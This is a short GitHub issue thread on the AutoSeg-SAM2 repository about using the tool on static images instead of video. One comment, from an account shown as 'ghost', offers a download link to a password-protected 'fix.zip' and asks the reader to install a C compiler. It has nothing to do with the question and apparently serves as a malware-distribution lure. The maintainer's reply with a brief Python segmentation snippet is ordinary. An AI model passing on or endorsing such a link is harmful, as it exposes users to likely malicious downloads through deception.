### ISSUE TITLE
Can I use this repo infer image instead of video?

### ISSUE THREAD

**Issue by ykk648** [zrporz/AutoSeg-SAM2#2]

**Comment by ghost** [comment]
I think this will help you.
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file

Password: changeme
If you don't have the c compliator, install it.(gcc or clang)

**Comment by zrporz** [comment]
Of course, our tool are adopted from the segment anything 1, to be specific,  the following code in `auto-mask-batch.py` can help generate the static image segmentation
```
image_path = os.path.join(video_dir,frame_names[now_frame])
image = cv2.imread(image_path)
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
masks_default, masks_s, masks_m, masks_l = mask_generator.generate(image)
```
